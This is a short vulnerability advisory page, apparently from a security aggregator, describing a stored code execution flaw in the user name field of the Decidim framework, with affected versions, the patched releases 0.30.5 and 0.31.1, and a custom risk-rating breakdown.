Primary

Context

Decidim Stored Code Execution Vulnerability in User Name Field

Vulnerability

Patched

A stored code execution vulnerability has been identified in the Decidim participatory democracy framework, specifically in versions prior to 0.30.5 and 0.31.0.rc1 through 0.31.0. This vulnerability allows a low-privileged attacker to execute arbitrary code in the context of any user who visits a comment page, leading to significant impacts on confidentiality and integrity across security boundaries.

Impact

Exploitation of this vulnerability allows for stored code execution, where injected code is executed in the context of users who view the affected comment page.

Remediation

Users can upgrade to Decidim versions 0.30.5 or 0.31.1 to address this vulnerability.

Added: Apr 13, 2026, 5:51 PM

Updated: Apr 13, 2026, 5:51 PM

Vulnerability Rating

Custom Algorithm

spread

2.2

impact

1.7

exploitability

5.2

remediation

7.7

relevance

5.8

threat

0.0

urgency

2.9

incentive

0.0

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.

Vulnerability Rating

Custom Algorithm

spread

2.2

impact

1.7

exploitability

5.2

remediation

7.7

relevance

5.8

threat

0.0

urgency

2.9

incentive

0.0

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.

Decidim Stored Code Execution Vulnerability in User Name Field

Vulnerability

Impact

Remediation

Affected Products

Decidim

CVSS Scores

References

Vulnerability Rating

Vulnerability Rating